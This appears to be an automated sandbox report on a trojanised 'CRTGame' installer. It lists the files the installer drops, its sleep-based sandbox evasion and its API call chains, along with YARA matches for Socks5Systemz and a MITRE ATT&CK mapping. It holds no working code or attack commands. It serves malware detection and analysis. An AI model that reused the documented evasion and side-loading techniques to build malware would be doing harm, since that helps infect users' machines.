Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LOMUV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2ASPL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-3QRHG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-B6UBH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M9T5O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-B7IAM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UNJDD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1BOH7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VFRK7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J36DT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-IQEKE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KHKMO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2AGLA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-93I59.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-A2FB0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-40RRA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PV0J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LPFO4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BEPVB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-9INH5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C1J3V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JM3DF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0U5DK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-5689

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_7-15875

Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 404	Thread sleep count: 153 > 30	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 404	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 796	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 404	Thread sleep count: 9806 > 30	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 404	Thread sleep time: -19612000s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004520C0 FindFirstFileA,GetLastError,	1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461E78

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B30

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: crtgame.exe, 00000007.00000002.3369579330.0000000003597000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000006C7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	API call chain: ExitProcess graph end node	graph_0-6729
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_5-2128
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_5-2135
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	API call chain: ExitProcess graph end node	graph_7-15877

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C4FBDE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

7_2_02C4FBDE

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

7_2_02C4FBDE

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

1_2_0044C030

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C35F2A RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,

7_2_02C35F2A

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C48F48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_02C48F48

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00476FAC

Source: C:\Windows\SysWOW64\net.exe

Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042DFC4

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C47A8D cpuid

7_2_02C47A8D

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: GetLocaleInfoA,	0_2_004051FC
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: GetLocaleInfoA,	0_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: GetLocaleInfoA,	1_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: GetLocaleInfoA,	1_2_004085BC

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00457CE8

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_00454AB8 GetUserNameA,

1_2_00454AB8

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Code function: 0_2_00405CE4 GetVersionExA,

0_2_00405CE4

Stealing of Sensitive Information

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000007.00000002.3368674379.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crtgame.exe PID: 1812, type: MEMORYSTR

Remote Access Functionality

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000007.00000002.3368674379.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crtgame.exe PID: 1812, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	4 Windows Service	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Scheduled Task/Job	1 Access Token Manipulation	23 Software Packing	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Bootkit	4 Windows Service	1 DLL Side-Loading	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Masquerading	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	112 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	3 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bootkit	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
wG1fFAzGfH.exe	58%	Virustotal		Browse
wG1fFAzGfH.exe	61%	ReversingLabs	Win32.Trojan.Sockssystemz
wG1fFAzGfH.exe	100%	Avira	HEUR/AGEN.1332570

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	0%	ReversingLabs
